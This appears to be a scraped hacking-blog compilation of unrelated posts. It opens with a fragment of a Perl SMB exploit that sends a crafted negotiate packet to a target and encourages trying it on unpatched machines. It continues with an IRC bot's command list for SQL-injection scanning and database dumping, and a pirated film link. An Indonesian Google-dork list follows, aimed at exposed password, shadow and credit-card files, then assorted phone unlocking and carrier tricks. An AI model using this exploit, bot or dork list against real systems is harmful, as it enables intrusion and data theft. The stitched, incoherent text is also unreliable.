my $payload = "\x00\x00\x00\x90". "\xff\x53\x4d\x42". "\x72\x00\x00\x00". "\x00\x18\x53\xc8". "\x00\x26". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe". "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54". "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31". "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00". "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57". "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61". "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c". "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c". "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e". "\x30\x30\x32\x00";
my $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"$port", Timeout=>'15') || die "Exploit failed to connect to the machine.\n\n";
print "System has been successfully exploited!\n\a"; print "Attempting to inject payload...\n"; sleep(4); print $sock "$payload"; print "Payload has been injected successfully!\n\a"; close($sock);
#coded by Phizo- #vulnerability discovered by Laurent Gaffié-
==============================================================
This code is user friendly, and you should be able to use this exploit. Do not rip this and call it your own either :) I will know, because this is unique and no one else has created this exploit in perl.
Enjoy the exploit! (Some systems have patched this, but you can still try, some people don't patch :P)
ScalezBot IRCBot v1.0 Features:RFI GoogleDork Scanner LFI GoogleDork Scanner SQL Injection GoogleDork Scanner MySQL column counter MsSQL Information gatherer (version, tables, etc.) MySQL Information gatherer (version, tables, etc.) MySQL Database Dumper MySQL Schema Dumper Open Source Changelog:- Version 1.0 [+] uri_escape() Google Search ban bypass [+] MsSQL information gatherer [+] Microsoft Access Vulnerability Detection (for SQL Injection) [--] Spreading Functions (byebye, skids) [+] Dynamic Channel String Detection Modules Needed:(All of these come with perl by default, if you for some reason don't have them, go to http://www.cpan.org)IO::Socket::INET LWP::UserAgent LWP::Simple URI::Escape XML::Simple Digest::MD5 qw(md5_hex) MIME::Base64 Commands:!help............................//prints all of the commands to $channel !col target....................//attempts to count culumns on 'target' (the URL) !det target...................//grab MySQL details for 'target' (the URL) !schema target............ //dump schema information (MySQL, target==URL) !dump target................//dump MySQL details !ms target...................//dump MsSQL details !sqlscan dork shell........//start googledork sql injection scan (where shell is the shell URL) !rfiscan dork................//start googledork RFI scan !lfiscan dork................//start LFI googledork scan !info..........................//bot information (author, etc.) Usage:Open the file with text editor. You will see a block that looks like this: Code: #= CONFIGURATION ==========================# my $server = "127.0.0.1"; # my $nick = "scalez"; # my $port = "61111"; # my $channel = "#h1t3m#"; # my $name = "scalez neconide sb unr"; # #= END OF CONFIGURATION ===================#
(NOTE: If you're on windows, it wont be parsed. It will have little squares instead. This is fine, just edit the configuration then run the script) edit $server to the IRC server, $nick to the nickname, $port to the port to connect on, and $channel to the channel you want it to join.
Inception (2010) DVDRip XviD Director: Christopher Nolan Writer (WGA): Christopher Nolan Release Date:16 July 2010 (USA) Genre:Mystery | Sci-Fi | Thriller Plot:In a world where technology exists to enter the human mind through dream invasion, a single idea within one's mind can be the most dangerous weapon or the most valuable asset... Download with Folder link'sCode: http://fileserve.com/list/AxrkGfM
Nah! tiba waktunya kita memanfaatkan "Paman Google" ini untuk search (nyari apa saja di internet) dengan waktu dan teknik yang bisa disebut "tepat". Lagi-lagi ini juga hasil dari berbagai hunting saya di berbagai web dan blog teman2 semua. Oleh karena itu ga salah juga saya pun turut andil ingin bagi-bagi informasi. Pertama, Anda bisa mencari dari : 1. Iklan Google yang ada di semua situs, hasilnya akan sama saja. 2. Tombol Google search yang ada di toolbar. 3. Google main search Engine : http://www.google.com/Selanjutnya agar pencarian bisa paling mendekati keinginan Anda, ikuti tips berikut : Dibawah ini akan dijelaskan tentang perintah khusus pada Google, dan akan dijelaskan pengertian dan penggunaan dari tiap – tiap perintah untuk mendapatkan informasi tersembunyi dan sangat penting. "Intitle:" ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan judul yang mengandung informasi pada topik yangdimaksud. Sebagai contoh pada pencarian, “intitle:password admin “ ( tanpa tanda kutip ). Pencarian akan mencari page yang mengandung kata “ password “ sebagai judulnya dengan prioritas utama “admin” .Jika pada pencarian terdapat dua query pencarian utama, digunakan sintaks allintitle: untuk pencarian secara lengkap. Sebagai contoh pada pencarian “allintitle:admin mdb”. Maka pencarian akan dibatasi pada dua subjek utama judul yaitu “admin” dan “mdb”. “inurl:” ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan semua URL yang hanya berisi kata kunci informasi yang dimaksudkan. Sebagai contoh pencarian dalam pencarian,”inurl : database mdb”. Pencarian akan menghasilkan semua URL yang hanya mengandung informasi tentang “database mdb “. Hal yang sama juga berlaku pada sintaks ini, jika terdapat dua query pencarian utama, digunakan sintaks “allinurl:” untuk mendapatkan list url tersebut. Sebagai contoh pencarian “allinurl: etc/passwd“ , pencarian akan menghasilkan URL yang mengandung informasi tentang “etc” dan “passwd”. Tanda garis miring slash (“/”) diantara dua kata etc dan passwd akan diabaikan oleh mesin pencari Google. >“site:” ialah sintaks perintah untuk membatasi pencarian suatu query informasi berdasarkan pada suatu situs atau domain tertentu. Sebagai contoh pada pencarian informasi: “waveguide site:itb.ac.id” (tanpa tanda kutip). Pencarian akan mencari topic tentang waveguide pada semua halaman yang tersedia pada domain itb.ac.id. “cache:” akan menunjukkan daftar web yang telah masuk kedalam indeks database Google. Sebagai contoh: “cache:deffcon.org”, pencarian akan memperlihatkan list yang disimpan pada Google untuk page deffcon.org “filetype:” ialah sintaks perintah pada Google untuk pencarian data pada internet dengan ekstensi tertentu (i.e. doc, pdf or ppt etc). Sebagai contoh pada pencarian : “filetype:doc site:go.id confidental” ( tanpa tanda kutip). Pencarian akan menghasilkan file data dengan ekstensi “.doc” pada semua domain go.id yang berisi informasi “confidential”. “link:” ialah sintaks perintah pada Google yang akan menunjukkan daftar list webpages yang memiliki link pada webpage special. Sebagai contoh:“link:www.securityf ocus.com” akan menunjukan daftar webpage yang memiliki point link pada page SecurityFocus.
“related:” sintaks ini akan memberikan daftar web pages yang serupa dengan web page yang di indikasikan. Sebagai contoh: “related:www.securityfocus.com”, pencarian akan memberi daftar web page yang serupa dengan homepage Securityfocus.
“intext:” sintaks perintah ini akan mencari kata kata pada website tertentu. Perintah ini mengabaikan link atau URL dan judul halaman. Sebagai contoh :“intext:admin” (tanpa tanda petik), pencarian akan menghasilkan link pada web page yang memiliki keyword yang memiliki keyword admin.
Pada kesempatan ini dipaparkan bagaimana penggunaan sintaks “index of” untuk mendapatkan hubungan pada webserver dengan direktori indeks browsing yang dapat diakses.. Hal tersebut merupakan sumber informasi yang sederhana dapat diperoleh, akan tetapi isi dari informasi seringkali merupakan informasi yang sangat penting. Informasi tersebut dapat saja berupa password akses atau data transaksi online dan hal yang sangat penting lainnya. Dibawah ini merupakan beberapa contoh penggunaan sintaks “ indeks of” untuk mendapatkan informasi yang penting dan sensitive sifatnya.
ex :
Index of /admin Index of /passwd Index of /password Index of /mail "Index of /" +passwd "Index of /" +password.txt "Index of /" +.htaccess "Index of /secret" "Index of /confidential" "Index of /root" "Index of /cgi-bin" "Index of /credit-card" "Index of /logs" "Index of /config" "Index of /admin.asp" "Index of /login.asp"
Sintaks “inurl:” atau “allinurl:” dapat dikombinasikan dengan sintaks yang lainnya seperti pada daftar dibawah ini :
inurl: /cgi-bin/cart32.exe inurl:admin filetype:txt inurl:admin filetype:db inurl:admin filetype:cfg inurl:mysql filetype:cfg inurl:passwd filetype:txt inurl:iisadmin inurl:auth_user_file.txt inurl:orders.txt inurl:"wwwroot/*." inurl:adpassword.txt inurl:webeditor.php inurl:file_upload.php inurl:gov filetype:xls "restricted" index of ftp +.mdb allinurl:/cgi-bin/ +mailto allinurl:/scripts/cart32.exe llinurl:/CuteNews/show_archives.php allinurl:/phpinfo.php allinurl:/privmsg.php allinurl:/privmsg.php inurl:cgi-bin/go.cgi?go=* allinurl:.cgi?page=*.txt allinurul:/modules/My_eGallery
Penggunaan lain dari sintaks “intitle:” atau “allintitle:” yang dikombinasikan dengan sintaks lainnya antara lain :
intitle:"Index of" .sh_history intitle:"Index of" .bash_history ntitle:"index of" passwd intitle:"index of" people.lst intitle:"index of" pwd.db intitle:"index of" etc/shadow intitle:"index of" spwd intitle:"index of" master.passwd intitle:"index of" htpasswd intitle:"index of" members OR accounts intitle:"index of" user_carts OR user_cart allintitle: sensitive filetype:doc allintitle: restricted filetype :mail allintitle: restricted filetype:doc site:gov allintitle:*.php?filename=* allintitle:*.php?page=* allintitle:*.php?logon=*
Dibawah ini ada beberapa contoh kasus: (silahkan mencoba...segala resiko berkenaan dengan security website yang dituju...merupakan tanggung jawab masing-masing)
Operator dasar
+, -, ~ , ., *, “”, |, OR
Operator tambahan
allintext:, allintitle:, allinurl:, bphonebook:, cache:, define:, filetype:, info:, intext:, intitle:, inurl:, link:, phonebook:, related:, rphonebook:, site:, numrange:, daterange
Extensi yang dapat dicari: HyperText Markup Language (html) Microsoft PowerPoint (ppt) Adobe Portable Document Format (pdf) Microsoft Word (doc) Adobe PostScript (ps) Microsoft Works (wks, wps, wdb) Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku) Microsoft Excel (xls) Microsoft Write (wri) Lotus WordPro (lwp) Rich Text Format (rtf) MacWrite (mw) Shockwave Flash (swf) Text (ans, txt)
Pencarian gaji Salary filetype: xls site: edu Salary filetype: xls site: edu
Informasi financial Filetype: xls “checking account” “credit card” -intext: Application -intext: Form Intitle: “Index of” finances.xls
Mencari inbox e-mail Intitle: Index.of inurl: Inbox (456) (mit mailbox) Intitle: Index.of inurl: Inbox (inurl: User OR inurl: Mail) (220)
Mendeteksi OS "Microsoft-IIS/5.0 server at” Intitle: “Welcome to Windows 2000 Internet Services” IIS 5.0 Intitle: Test.Page.for.Apache seeing.this.instead Intitle: Test.page “SSL/TLS-aware”
Mencari password Inurl: etc inurl: passwd Intitle: “Index of..etc” passwd "# -FrontPage-" inurl: service.pwd Inurl: admin.pwd filetype: pwd Filetype: inc dbconn Filetype: inc intext: mysql_connect Filetype: ini +ws_ftp +pwd Filetype: log inurl: “password.log”
Mencari User Name +intext: "webalizer" +intext: “Total Usernames” +intext: “Usage Statistics for”
Mencari License Key Filetype: lic lic intext: key
Sensitve Directories Listing Intitle: “Index of” cfide Intitle: index.of.winnt Intitle: “index of” iissamples
saya tak bertanggung jawab atas setiap kegiatan anda yang mengargumenkan artikel ini.........
maaf........ resiko ditanggung sendiri........ by Ferdy Ansa a.k.a Hacker Mania
Posting ini benar-benar mungkin terlihat konyol bagi Anda semua tetapi sebenarnya hal-hal yang berguna .. Di bawah ini tercantum semua kode rahasia yang digunakan oleh (Reliance CDMA) Reliance's dealer, dan spys KnowBest.info s 'telah secara eksklusif mendapatkan semua kode hanya untuk Anda. Untuk checka tanggal aktivasi nomor tertentu RSN dan nomor mobile Kirim SMS ke 53.738 berikut:
1.
ODR RSNNUMBER
(Trik ini benar-benar akan bekerja saat ponsel Anda hilang dan Anda ingin memeriksa status)
1.
Untuk memeriksa tanggal aktivasi nomor ponsel tertentu:
Kirim SMS ke 53.738 berikut:
ODM MOBILENUMBER
2.
Untuk memeriksa status nomor RSN.
Kirim SMS ke 53.738 berikut:
GETSTAT RSNNUMBER
(Kode ini menunjukkan status handset Anda. Apakah itu dilaporkan hilang atau sebagainya ..)
3.
Untuk memeriksa status aplikasi Anda:
Kirim SMS ke 53.738 berikut:
STAT RSNNUMBER
(Ini benar-benar berguna saat Anda membeli ponsel baru dan Anda ingin memeriksa status penerapannya)
jika Anda ingin membuka ponsel nokia Anda bebas sehingga semua simcards dapat digunakan di dalamnya, ikuti langkah-langkah dengan benar sehingga Anda membuka ponsel nokia tanpa problem.to pun membuka pencarian mobile gratis Anda untuk membuka kode pada bersih atau periksa kembali saya akan posting Anda membuka kode untuk ponsel nokia. METODE UNTUK UNLOCK LANGKAH - Cara Masukkan Nokia membuka Kode untuk membuka...
1.Hapus simcard Anda dan beralih pada ponsel Anda 2. Tulis pw # + kode 1 # ("kode" dimaksudkan untuk menjadi aktual membuka kode, yang Anda dapat membeli memeriksa posting baru saya) KODE JIKA ATAS IS REJECTED, PENGGANTI ATAS 1 DENGAN 7.SO IT IS: # PW + YOURCODE 7 #
Huruf P muncul setelah Anda cepat tekan 3 kali tombol bintang (*) Surat W muncul setelah Anda cepat tekan 4 kali tombol bintang (*) The + surat muncul setelah Anda cepat tekan 2 kali tombol bintang (*) Ponsel menunjukkan "SIM Restriction Off" dan telepon dibuka!
cara ini Anda dapat membuka ponsel nokia Anda bebas tanpa risiko membayar untuk banyak layanan centre.you sel bisa melakukannya sepenuhnya gratis jika Anda mengetahui kode unlock ponsel nokia.
Sebuah SMS sekali dihapus tidak dapat dibaca lagi ... pesan. Tapi kadang-kadang kita tidak sengaja menghapus beberapa penting. Berikut adalah teknik yang harus diikuti untuk mengambil SMS dihapus. Diperlukan utilitas: 1) Setiap sistem atau file explorer explorer program (misalnya fileman atau fexplorer.provided dengan paket)
Langkah 1) Fexplorer Buka... Lihat Selengkapnya
Langkah 2) Pilih drive C: atau D: tergantung pada memori di mana pesan Sms telah disimpan.
Langkah 3) Sebagai contoh u dipilih c:, Lalu terbuka "sistem" folder.
Langkah 4) Kemudian pada "sistem" buka folder "mail" folder.
Langkah 5) Kemudian pada folder ini u akan melihat folder yang berbeda (misalnya 0010001_s) dan file tertentu (misalnya 00100000).
File-file ini adalah pesan yang sebenarnya. Menelusuri setiap folder dan membuka semua file sampai u mendapatkan sms u cari.
Langkah 6) Untuk membuka file yang tidak memilih pilihan> file> terbuka seperti itu akan menampilkan format yang tidak didukung lebih memilih Pilihan> hex file> / penampil teks.
Dengan memilih "Hex / penampil teks" akan ll u bisa membuka dan membaca pesan SMS dihapus
Hampir semua orang pada saat ini mempunyai handphone. Mereka ingin menggunakan handphone mereka secara maksimal seperti menggunakannya untuk akses internet namun mereka tidak tahu bagaimana cara mensetting GPRS handphone mereka sesuai provider yang mereka gunakan masing-masing. Mereka sudah berusaha untuk menanyakan ke teman mereka, call center operator yang dipakai untuk menanyakan bagaimana caranya mensetting GPRS handphone mereka, namu terkadang upaya tersebut sia-sia. Kami akan memberikan anda cara setting GPRS sesuai provider/operator yang anda gunakan. - Excelcomindo APN : www.xlgprs.net Username: xlgprs Password: proxl DNS: 202.152.254.245 / 202.152.254.246 Proxy: 202.152.240.50 port 8080/9201 - IM3 APN: www.indosat-m3.net / wap.indosat-m3.net Username: gprs Password: im3 DNS: 202.155.46.66 / 202.155.46.77 SMTP: mail.indosat-m3.net Proxy: 10.19.19.19 port 8080/9201 - Indosat(Matrix) APN: satelindogprs.com / indosatgprs Username: guest Password: guest DNS: 202.155.46.66 / 202.155.46.77 SMTP: smtp.indosat.net.id Proxy: 202.152.162.88 port 8080/9201 - Telkomsel APN: internet / telkomsel Username: wap Password: wap123 DNS: 202.152.0.2 / 202.155.14.251 / 202.155.14.253 SMTP: mail.telkomsel.com Proxy: 10.1.89.130 port 8000/9201 Selamat mencoba, Good Luck Admin: s60_forum
|